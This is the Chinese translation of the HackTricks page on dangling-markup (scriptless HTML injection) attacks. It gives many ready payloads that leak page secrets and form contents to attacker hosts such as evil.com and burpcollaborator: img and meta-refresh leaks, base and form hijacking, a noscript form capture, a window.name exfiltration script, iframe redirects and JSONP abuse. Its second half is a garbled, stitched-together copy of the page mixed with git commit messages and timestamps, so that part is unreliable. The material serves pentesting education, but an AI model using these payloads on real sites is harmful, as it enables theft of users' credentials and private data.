hacktricks/pentesting-web/dangling-markup-html-scriptless-injection/README.md

# Dangling Markup - HTML scriptless injection

{% hint style="success" %}
学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>支持 HackTricks</summary>

* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。

</details>
{% endhint %}

## 简介

此技术可用于在发现 **HTML 注入** 时从用户提取信息。如果你 **找不到任何利用** [**XSS** ](../xss-cross-site-scripting/) 的方法，但可以 **注入一些 HTML 标签**，这将非常有用。\
如果某些 **秘密以明文形式** 保存在 HTML 中，并且你想从客户端 **提取** 它，或者如果你想误导某些脚本执行，这也很有用。

这里提到的几种技术可以通过以意想不到的方式（html 标签、CSS、http-meta 标签、表单、base...）提取信息来绕过某些 [**内容安全策略**](../content-security-policy-csp-bypass/)。

## 主要应用

### 偷取明文秘密

如果你在页面加载时注入 `<img src='http://evil.com/log.cgi?`，受害者将向你发送所有在注入的 `img` 标签和代码中的下一个引号之间的代码。如果某个秘密以某种方式位于该块中，你将偷取它（你也可以使用双引号，看看哪个更有趣）。

如果 `img` 标签被禁止（例如由于 CSP），你也可以使用 `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
```html
<img src='http://attacker.com/log.php?HTML=
<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
```
注意，**Chrome 阻止包含 "<" 或 "\n" 的 HTTP URL**，因此您可以尝试其他协议方案，如 "ftp"。

您还可以滥用 CSS `@import`（将发送所有代码，直到找到 ";"）
```html
<style>@import//hackvertor.co.uk?     <--- Injected
<b>steal me!</b>;
```
您还可以使用 **`<table`**：
```html
<table background='//your-collaborator-id.burpcollaborator.net?'
```
您还可以插入一个 `<base` 标签。所有信息将在引号关闭之前发送，但这需要一些用户交互（用户必须点击某个链接，因为 base 标签将更改链接指向的域）：
```html
<base target='        <--- Injected
steal me'<b>test</b>
```
### 偷取表单
```html
<base href='http://evil.com/'>
```
然后，发送数据到路径的表单（如 `<form action='update_profile.php'>`）将把数据发送到恶意域名。

### Stealing forms 2

设置表单头：`<form action='http://evil.com/log_steal'>` 这将覆盖下一个表单头，所有来自表单的数据将被发送给攻击者。

### Stealing forms 3

按钮可以通过属性 "formaction" 更改信息将要发送到的表单的 URL：
```html
<button name=xss type=submit formaction='https://google.com'>I get consumed!
```
攻击者可以利用这一点窃取信息。

在这个[**报告中找到此攻击的示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。

### 窃取明文秘密 2

使用最新提到的技术窃取表单（注入新的表单头），您可以然后注入一个新的输入字段：
```html
<input type='hidden' name='review_body' value="
```
并且这个输入字段将包含其双引号之间和下一个双引号之间的所有内容在HTML中。这个攻击将“_**Stealing clear text secrets**_”与“_**Stealing forms2**_”混合在一起。

你可以通过注入一个表单和一个`<option>`标签来做同样的事情。所有数据直到找到一个关闭的`</option>`将被发送：
```html
<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
```
### 表单参数注入

您可以更改表单的路径并插入新值，以便执行意外的操作：
```html
<form action='/change_settings.php'>
<input type='hidden' name='invite_user'
value='fredmbogo'>                                        ← Injected lines

<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
...
<input type="text" name="invite_user" value="">             ← Subverted field
...
<input type="hidden" name="xsrf_token" value="12345">
...
</form>
```
### 通过 noscript 偷取明文秘密

`<noscript></noscript>` 是一个标签，其内容将在浏览器不支持 JavaScript 时被解释（您可以在 [chrome://settings/content/javascript](chrome://settings/content/javascript) 中启用/禁用 JavaScript）。

一种将从注入点到页面底部的网页内容导出到攻击者控制的网站的方法是注入以下内容：
```html
<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
```
### Bypassing CSP with user interaction

从这个 [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) 中你可以了解到，即使在 **最严格的 CSP** 环境中，你仍然可以通过一些 **用户交互** 来 **提取数据**。在这种情况下，我们将使用以下有效载荷：
```html
<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
<base target='
```
注意，你将要求**受害者**点击一个**链接**，该链接将**重定向**他到由你控制的**有效载荷**。还要注意，**`base`**标签中的**`target`**属性将包含**HTML内容**，直到下一个单引号。\
这将使得如果点击链接，**`window.name`**的**值**将是所有的**HTML内容**。因此，由于你**控制了受害者**通过点击链接访问的页面，你可以访问该**`window.name`**并**提取**该数据：
```html
<script>
if(window.name) {
new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
</script>
```
### Misleading script workflow 1 - HTML namespace attack

在 HTML 中插入一个带有 id 的新标签，该标签将覆盖下一个标签，并且其值将影响脚本的流程。在这个例子中，您正在选择与谁共享信息：
```html
<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
...
Share this status update with:                              ← Legitimate optional element of a dialog
<input id='share_with' value=''>

...

function submit_status_update() {
...
request.share_with = document.getElementById('share_with').value;
...
}
```
### 误导性脚本工作流程 2 - 脚本命名空间攻击

通过插入 HTML 标签在 JavaScript 命名空间内创建变量。然后，这个变量将影响应用程序的流程：
```html
<img id='is_public'>                                        ← Injected markup

...

// Legitimate application code follows

function retrieve_acls() {
...
if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
is_public = true;
else
is_public = false;
}

function submit_new_acls() {
...
if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
...
}
```
### Abuse of JSONP

如果你发现一个 JSONP 接口，你可能能够使用任意数据调用任意函数：
```html
<script src='/editor/sharing.js'>:              ← Legitimate script
function set_sharing(public) {
if (public) request.access_mode = AM_PUBLIC;
else request.access_mode = AM_PRIVATE;
...
}

<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
set_sharing({ ... })
```
或者你甚至可以尝试执行一些javascript：
```html
<script src='/search?q=a&call=alert(1)'></script>
```
### Iframe 滥用

子文档能够查看和修改其父文档的 `location` 属性，即使在跨源情况下也是如此。这允许在 **iframe** 中嵌入一个脚本，可以将客户端重定向到任意页面：
```html
<html><head></head><body><script>top.window.location = "https://attacker.com/hacked.html"</script></body></html>
```
这可以通过类似于：`sandbox=' allow-scripts allow-top-navigation'` 来缓解。

iframe 也可以被滥用来泄露来自不同页面的敏感信息 **使用 iframe name 属性**。这是因为你可以创建一个 iframe，它自身嵌套 iframe，利用 HTML 注入使 **敏感信息出现在 iframe name 属性中**，然后从初始 iframe 访问该名称并泄露它。
```html
<script>
function cspBypass(win) {
win[0].location = 'about:blank';
setTimeout(()=>alert(win[0].name), 500);
}
</script>

<iframe src="//subdomain1.portswigger-labs.net/bypassing-csp-with-dangling-iframes/target.php?email=%22><iframe name=%27" onload="cspBypass(this.contentWindow)"></iframe>
```
For more info check [https://portswigger.net/research/bypassing-csp-with-dangling-iframes](https://portswigger.net/research/bypassing-csp-with-dangling-iframes)

### \<meta 滥用

您可以使用 **`meta http-equiv`** 执行 **多个操作**，例如设置 Cookie: `<meta http-equiv="Set-Cookie" Content="SESSID=1">` 或执行重定向（在此情况下为 5 秒）: `<meta name="language" content="5;http://attacker.svg" HTTP-EQUIV="refresh" />`

这可以通过关于 **http-equiv** 的 **CSP** 来 **避免**（ `Content-Security-Policy: default-src 'self';`，或 `Content-Security-Policy: http-equiv 'self';`）

### 新的 \<portal HTML 标签

您可以在 [这里](https://research.securitum.com/security-analysis-of-portal-element/) 找到关于 \<portal 标签可利用漏洞的非常 **有趣的研究**。\
在撰写本文时，您需要在 `chrome://flags/#enable-portals` 中启用 portal 标签，否则它将无法工作。
```html
<portal src='https://attacker-server?
```
### HTML 泄漏

并非所有在 HTML 中泄漏连接的方式都对 Dangling Markup 有用，但有时它可能会有所帮助。请在这里查看： [https://github.com/cure53/HTTPLeaks/blob/master/leak.html](https://github.com/cure53/HTTPLeaks/blob/master/leak.html)

## SS-Leaks

这是 **dangling markup 和 XS-Leaks** 的 **混合**。一方面，漏洞允许在 **同源** 的页面中 **注入 HTML**（但不包括 JS）。另一方面，我们不会直接 **攻击** 可以注入 HTML 的页面，而是 **另一个页面**。

{% content-ref url="ss-leaks.md" %}
[ss-leaks.md](ss-leaks.md)
{% endcontent-ref %}

## XS-Search/XS-Leaks

XS-Search 旨在 **提取跨源信息**，利用 **侧信道攻击**。因此，这是一种不同于 Dangling Markup 的技术，然而，一些技术利用了 HTML 标签的包含（有和没有 JS 执行），如 [**CSS Injection**](../xs-search/#css-injection) 或 [**Lazy Load Images**](../xs-search/#image-lazy-loading)**.**

{% content-ref url="../xs-search/" %}
[xs-search](../xs-search/)
{% endcontent-ref %}

## 暴力破解检测列表

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/dangling_markup.txt" %}

## 参考文献

* [https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057](https://aswingovind.medium.com/content-spoofing-yes-html-injection-39611d9a4057)
* [http://lcamtuf.coredump.cx/postxss/](http://lcamtuf.coredump.cx/postxss/)
* [http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/](http://www.thespanner.co.uk/2011/12/21/html-scriptless-attacks/)
* [https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup)

{% hint style="success" %}
学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术： <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>支持 HackTricks</summary>

* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。

</details>
{% endhint %}
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
+								# Dangling Markup - HTML scriptless injection
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								{% hint style="success" %}
 								学习与实践 AWS 黑客技术：<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								学习与实践 GCP 黑客技术：<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								<details>
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								<summary>支持 HackTricks</summary>
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
 								* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								</details>
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								{% endhint %}
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								## 简介
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								此技术可用于在发现 **HTML 注入** 时从用户提取信息。如果你 **找不到任何利用** [**XSS** ](../xss-cross-site-scripting/) 的方法，但可以 **注入一些 HTML 标签**，这将非常有用。\
 								如果某些 **秘密以明文形式** 保存在 HTML 中，并且你想从客户端 **提取** 它，或者如果你想误导某些脚本执行，这也很有用。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								这里提到的几种技术可以通过以意想不到的方式（html 标签、CSS、http-meta 标签、表单、base...）提取信息来绕过某些 [**内容安全策略**](../content-security-policy-csp-bypass/)。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
 								## 主要应用
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### 偷取明文秘密
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								如果你在页面加载时注入 `<img src='http://evil.com/log.cgi?`，受害者将向你发送所有在注入的 `img` 标签和代码中的下一个引号之间的代码。如果某个秘密以某种方式位于该块中，你将偷取它（你也可以使用双引号，看看哪个更有趣）。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								如果 `img` 标签被禁止（例如由于 CSP），你也可以使用 `<meta http-equiv="refresh" content="4; URL='http://evil.com/log.cgi?`
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<img src='http://attacker.com/log.php?HTML=
 								<meta http-equiv="refresh" content='0; url=http://evil.com/log.php?text=
 								<meta http-equiv="refresh" content='0;URL=ftp://evil.com?a=
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								注意，**Chrome 阻止包含 "<" 或 "\n" 的 HTTP URL**，因此您可以尝试其他协议方案，如 "ftp"。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								您还可以滥用 CSS `@import`（将发送所有代码，直到找到 ";"）
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<style>@import//hackvertor.co.uk?     <--- Injected
 								<b>steal me!</b>;
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								您还可以使用 **`<table`**：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<table background='//your-collaborator-id.burpcollaborator.net?'
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								您还可以插入一个 `<base` 标签。所有信息将在引号关闭之前发送，但这需要一些用户交互（用户必须点击某个链接，因为 base 标签将更改链接指向的域）：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<base target='        <--- Injected
 								steal me'<b>test</b>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### 偷取表单
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<base href='http://evil.com/'>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								然后，发送数据到路径的表单（如 `<form action='update_profile.php'>`）将把数据发送到恶意域名。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### Stealing forms 2
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								设置表单头：`<form action='http://evil.com/log_steal'>` 这将覆盖下一个表单头，所有来自表单的数据将被发送给攻击者。
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### Stealing forms 3
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								按钮可以通过属性 "formaction" 更改信息将要发送到的表单的 URL：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<button name=xss type=submit formaction='https://google.com'>I get consumed!
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								攻击者可以利用这一点窃取信息。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								在这个[**报告中找到此攻击的示例**](https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp)。
-												Translated ['forensics/basic-forensic-methodology/partitions-file-system

											
										
										
											2024-03-24 13:16:57 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### 窃取明文秘密 2
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								使用最新提到的技术窃取表单（注入新的表单头），您可以然后注入一个新的输入字段：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<input type='hidden' name='review_body' value="
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								并且这个输入字段将包含其双引号之间和下一个双引号之间的所有内容在HTML中。这个攻击将“_**Stealing clear text secrets**_”与“_**Stealing forms2**_”混合在一起。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								你可以通过注入一个表单和一个`<option>`标签来做同样的事情。所有数据直到找到一个关闭的`</option>`将被发送：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<form action=http://google.com><input type="submit">Click Me</input><select name=xss><option
 								```
 								### 表单参数注入
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								您可以更改表单的路径并插入新值，以便执行意外的操作：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<form action='/change_settings.php'>
 								<input type='hidden' name='invite_user'
 								value='fredmbogo'>                                        ← Injected lines
 								<form action="/change_settings.php">                        ← Existing form (ignored by the parser)
 								...
 								<input type="text" name="invite_user" value="">             ← Subverted field
 								...
 								<input type="hidden" name="xsrf_token" value="12345">
 								...
 								</form>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### 通过 noscript 偷取明文秘密
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								`<noscript></noscript>` 是一个标签，其内容将在浏览器不支持 JavaScript 时被解释（您可以在 [chrome://settings/content/javascript](chrome://settings/content/javascript) 中启用/禁用 JavaScript）。
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								一种将从注入点到页面底部的网页内容导出到攻击者控制的网站的方法是注入以下内容：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<noscript><form action=http://evil.com><input type=submit style="position:absolute;left:0;top:0;width:100%;height:100%;" type=submit value=""><textarea name=contents></noscript>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### Bypassing CSP with user interaction
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								从这个 [portswiggers research](https://portswigger.net/research/evading-csp-with-dom-based-dangling-markup) 中你可以了解到，即使在 **最严格的 CSP** 环境中，你仍然可以通过一些 **用户交互** 来 **提取数据**。在这种情况下，我们将使用以下有效载荷：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<a href=http://attacker.net/payload.html><font size=100 color=red>You must click me</font></a>
 								<base target='
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								注意，你将要求**受害者**点击一个**链接**，该链接将**重定向**他到由你控制的**有效载荷**。还要注意，**`base`**标签中的**`target`**属性将包含**HTML内容**，直到下一个单引号。\
 								这将使得如果点击链接，**`window.name`**的**值**将是所有的**HTML内容**。因此，由于你**控制了受害者**通过点击链接访问的页面，你可以访问该**`window.name`**并**提取**该数据：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<script>
 								if(window.name) {
 								new Image().src='//your-collaborator-id.burpcollaborator.net?'+encodeURIComponent(window.name);
 								</script>
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### Misleading script workflow 1 - HTML namespace attack
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								在 HTML 中插入一个带有 id 的新标签，该标签将覆盖下一个标签，并且其值将影响脚本的流程。在这个例子中，您正在选择与谁共享信息：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<input type='hidden' id='share_with' value='fredmbogo'>     ← Injected markup
 								...
 								Share this status update with:                              ← Legitimate optional element of a dialog
 								<input id='share_with' value=''>
 								...
 								function submit_status_update() {
 								...
 								request.share_with = document.getElementById('share_with').value;
 								...
 								}
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### 误导性脚本工作流程 2 - 脚本命名空间攻击
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								通过插入 HTML 标签在 JavaScript 命名空间内创建变量。然后，这个变量将影响应用程序的流程：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<img id='is_public'>                                        ← Injected markup
 								...
 								// Legitimate application code follows
 								function retrieve_acls() {
 								...
 								if (response.access_mode == AM_PUBLIC)                    ← The subsequent assignment fails in IE
 								is_public = true;
 								else
 								is_public = false;
 								}
 								function submit_new_acls() {
 								...
 								if (is_public) request.access_mode = AM_PUBLIC;           ← Condition always evaluates to true
 								...
 								}
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								### Abuse of JSONP
-												GitBook: No commit message

											
										
										
											2024-04-06 18:13:07 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								如果你发现一个 JSONP 接口，你可能能够使用任意数据调用任意函数：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<script src='/editor/sharing.js'>:              ← Legitimate script
 								function set_sharing(public) {
 								if (public) request.access_mode = AM_PUBLIC;
 								else request.access_mode = AM_PRIVATE;
 								...
 								}
 								<script src='/search?q=a&call=set_sharing'>:    ← Injected JSONP call
 								set_sharing({ ... })
 								```
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								或者你甚至可以尝试执行一些javascript：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-05 20:18:17 +00:00
+								```html
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
+								<script src='/search?q=a&call=alert(1)'></script>
 								```
-												Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

											
										
										
											2024-01-02 22:21:01 +00:00
+								### Iframe 滥用
-												Translated ['generic-methodologies-and-resources/pentesting-network/nmap

											
										
										
											2023-08-24 09:57:53 +00:00
-												Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

											
										
										
											2024-07-19 15:59:20 +00:00
+								子文档能够查看和修改其父文档的 `location` 属性，即使在跨源情况下也是如此。这允许在 **iframe** 中嵌入一个脚本，可以将客户端重定向到任意页面：
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

